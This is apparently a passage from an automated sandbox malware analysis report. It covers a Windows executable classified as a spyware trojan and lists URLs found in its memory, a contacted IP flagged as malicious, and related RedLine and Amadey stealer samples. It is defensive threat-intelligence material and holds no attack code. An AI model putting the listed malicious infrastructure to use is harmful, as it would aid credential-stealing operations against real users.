                                http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://tempuri.org/Entity/Id21ResponsekLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_WrapkLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://tempuri.org/Entity/Id9kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLIDkLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://tempuri.org/Entity/Id8kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://tempuri.org/Entity/Id5kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://schemas.xmlsoap.org/ws/2004/10/wsat/PreparekLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://tempuri.org/Entity/Id4kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://tempuri.org/Entity/Id7kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://tempuri.org/Entity/Id6kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecretkLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://tempuri.org/Entity/Id19ResponsekLL28QE.exe, 00000006.00000002.410010278.0000000005055000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#licensekLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/IssuekLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://schemas.xmlsoap.org/ws/2004/10/wsat/AbortedkLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequencekLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://schemas.xmlsoap.org/ws/2004/10/wsat/faultkLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://schemas.xmlsoap.org/ws/2004/10/wsatkLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeykLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://tempuri.org/Entity/Id15ResponsekLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namekLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/RenewkLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterkLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://tempuri.org/Entity/Id6ResponsekLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKeykLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://api.ip.sb/ipkLL28QE.exe, kLL28QE.exe, 00000006.00000002.409653940.0000000004B30000.00000004.08000000.00040000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.409570001.0000000004A06000.00000004.00000020.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.413757466.00000000071B0000.00000004.08000000.00040000.00000000.sdmp, kLL28QE.exe, 00000006.00000003.346233138.0000000002FB5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://schemas.xmlsoap.org/ws/2004/04/sckLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PCkLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/CancelkLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://tempuri.org/Entity/Id9ResponsekLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=kLL28QE.exe, 00000006.00000002.411292105.0000000005E11000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://tempuri.org/Entity/Id20kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://tempuri.org/Entity/Id21kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://tempuri.org/Entity/Id22kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/IssuekLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://tempuri.org/Entity/Id1ResponsekLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=kLL28QE.exe, 00000006.00000002.410010278.000000000500E000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.0000000005DB2000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.0000000005DCF000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.0000000006038000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.00000000050DF000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.0000000005DE0000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.00000000060F0000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.000000000629A000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.00000000050C3000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.0000000005E11000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequestedkLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnlykLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://schemas.xmlsoap.org/ws/2004/10/wsat/ReplaykLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnegokLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64BinarykLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PCkLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKeykLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://schemas.xmlsoap.org/ws/2004/08/addressingkLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/RST/IssuekLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://schemas.xmlsoap.org/ws/2004/10/wsat/CompletionkLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://schemas.xmlsoap.org/ws/2004/04/trustkLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://tempuri.org/Entity/Id10kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      http://tempuri.org/Entity/Id11kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      http://tempuri.org/Entity/Id12kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      http://tempuri.org/Entity/Id16ResponsekLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponsekLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/CancelkLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://tempuri.org/Entity/Id13kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          http://tempuri.org/Entity/Id14kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          http://tempuri.org/Entity/Id15kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          http://tempuri.org/Entity/Id16kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/NoncekLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://tempuri.org/Entity/Id17kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://tempuri.org/Entity/Id18kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://tempuri.org/Entity/Id5ResponsekLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://tempuri.org/Entity/Id19kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnskLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://tempuri.org/Entity/Id10ResponsekLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.0000000005055000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/RenewkLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/rm8DkLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://tempuri.org/Entity/Id8ResponsekLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
                                                                                                                  http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKeykLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionIDkLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCTkLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://schemas.xmlsoap.org/ws/2006/02/addressingidentitykLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://schemas.xmlsoap.org/soap/envelope/kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://search.yahoo.com?fr=crmas_sfpfkLL28QE.exe, 00000006.00000002.410010278.000000000500E000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.0000000005DB2000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.0000000005DCF000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.0000000006038000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.00000000050DF000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.0000000005DE0000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.00000000060F0000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.000000000629A000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.00000000050C3000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.0000000005E11000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKeykLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trustkLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://schemas.xmlsoap.org/ws/2004/10/wsat/RollbackkLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCTkLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://schemas.xmlsoap.org/ws/2004/06/addressingexkLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://schemas.xmlsoap.org/ws/2004/10/wscoorkLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://schemas.xmlsoap.org/ws/2004/04/security/trust/NoncekLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponsekLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://schemas.xmlsoap.org/ws/2004/08/addressing/faultkLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/RenewkLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                      • 75% < No. of IPs
                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                      193.233.20.23
                                                                                                                                                      unknownRussian Federation
                                                                                                                                                      8749REDCOM-ASRedcomKhabarovskRussiaRUtrue
                                                                                                                                                      Joe Sandbox Version:36.0.0 Rainbow Opal
                                                                                                                                                      Analysis ID:815074
                                                                                                                                                      Start date and time:2023-02-25 09:07:26 +01:00
                                                                                                                                                      Joe Sandbox Product:CloudBasic
                                                                                                                                                      Overall analysis duration:0h 12m 10s
                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                      Report type:full
                                                                                                                                                      Cookbook file name:default.jbs
                                                                                                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                      Number of analysed new started processes analysed:13
                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                      Technologies:
                                                                                                                                                      • HCA enabled
                                                                                                                                                      • EGA enabled
                                                                                                                                                      • HDC enabled
                                                                                                                                                      • AMSI enabled
                                                                                                                                                      Analysis Mode:default
                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                      Sample file name:y0EWt2mE9h.exe
                                                                                                                                                      Original Sample Name:0588e4e46299165692a58b2046b3ea12.exe
                                                                                                                                                      Detection:MAL
                                                                                                                                                      Classification:mal100.troj.spyw.evad.winEXE@15/10@0/1
                                                                                                                                                      EGA Information:
                                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                                      HDC Information:
                                                                                                                                                      • Successful, ratio: 28.7% (good quality ratio 27.5%)
                                                                                                                                                      • Quality average: 84.7%
                                                                                                                                                      • Quality standard deviation: 23.7%
                                                                                                                                                      HCA Information:
                                                                                                                                                      • Successful, ratio: 96%
                                                                                                                                                      • Number of executed functions: 139
                                                                                                                                                      • Number of non-executed functions: 146
                                                                                                                                                      Cookbook Comments:
                                                                                                                                                      • Found application associated with file extension: .exe
                                                                                                                                                      • Override analysis time to 240s for rundll32
                                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe
                                                                                                                                                      • Excluded domains from analysis (whitelisted): client.wns.windows.com, ctldl.windowsupdate.com
                                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                      TimeTypeDescription
                                                                                                                                                      09:09:10API Interceptor11x Sleep call for process: kLL28QE.exe modified
                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                      193.233.20.23zFtWwDA5vo.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                        7VyO2X2qrg.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                          way7V9QNqy.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                            wWunQ5ee2y.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                              9Ih54BvUwE.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                NRCNrGYPkR.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                  2xnkXPOIvj.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                    FACVtLdvUY.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                      b4VdJh7UV4.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                        fhEA8WlKvm.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                          ruL9tnidB9.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                            aAD8mhS5Ek.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                              CDsVJ8ZX12.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                ygJhkFf8I8.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                  72YuM3gI98.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                    20DGmnz3X7.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                      crIxf82W5v.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                        file.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                          nR8QYM2it8.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                            g3YjXs29ra.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                              No context
                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                              REDCOM-ASRedcomKhabarovskRussiaRUzFtWwDA5vo.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                              • 193.233.20.23
                                                                                                                                                                                              7VyO2X2qrg.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                              • 193.233.20.23
                                                                                                                                                                                              way7V9QNqy.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                              • 193.233.20.23
                                                                                                                                                                                              wWunQ5ee2y.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                              • 193.233.20.23
                                                                                                                                                                                              9Ih54BvUwE.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                              • 193.233.20.23
                                                                                                                                                                                              NRCNrGYPkR.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                              • 193.233.20.23
                                                                                                                                                                                              2xnkXPOIvj.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                              • 193.233.20.23
                                                                                                                                                                                              FACVtLdvUY.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                              • 193.233.20.23
                                                                                                                                                                                              b4VdJh7UV4.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                              • 193.233.20.23
                                                                                                                                                                                              fhEA8WlKvm.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                              • 193.233.20.23
                                                                                                                                                                                              ruL9tnidB9.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                              • 193.233.20.23
                                                                                                                                                                                              aAD8mhS5Ek.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                              • 193.233.20.23
                                                                                                                                                                                              CDsVJ8ZX12.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                              • 193.233.20.23
                                                                                                                                                                                              ygJhkFf8I8.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                              • 193.233.20.23
                                                                                                                                                                                              72YuM3gI98.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                              • 193.233.20.23
                                                                                                                                                                                              20DGmnz3X7.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                              • 193.233.20.23
                                                                                                                                                                                              crIxf82W5v.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                              • 193.233.20.23
                                                                                                                                                                                              66BF743BABAD7405D2426B25BF8D1BB493F6D9048B55E.exeGet hashmaliciousRaccoon Stealer v2, RedLine, SmokeLoader, Socelars, onlyLoggerBrowse
                                                                                                                                                                                              • 193.233.20.21
                                                                                                                                                                                              file.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                              • 193.233.20.23
                                                                                                                                                                                              nR8QYM2it8.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                              • 193.233.20.23
                                                                                                                                                                                              No context
                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
